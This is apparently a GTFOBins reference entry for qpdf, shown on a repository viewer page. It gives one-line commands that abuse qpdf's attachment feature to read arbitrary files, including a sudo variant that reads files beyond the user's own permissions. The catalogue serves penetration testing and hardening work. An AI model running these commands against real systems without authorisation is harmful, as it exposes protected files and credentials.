GTFOBins.github.io/_gtfobins/qpdf.md

10 lines
283 B
Markdown
Raw Normal View History

2024-04-12 17:33:45 +02:00
---
functions:
file-read:
- code: |
qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename
sudo:
- code: |
sudo qpdf --empty --add-attachment /path/filename -- out.pdf; qpdf out.pdf --show-attachment=filename
---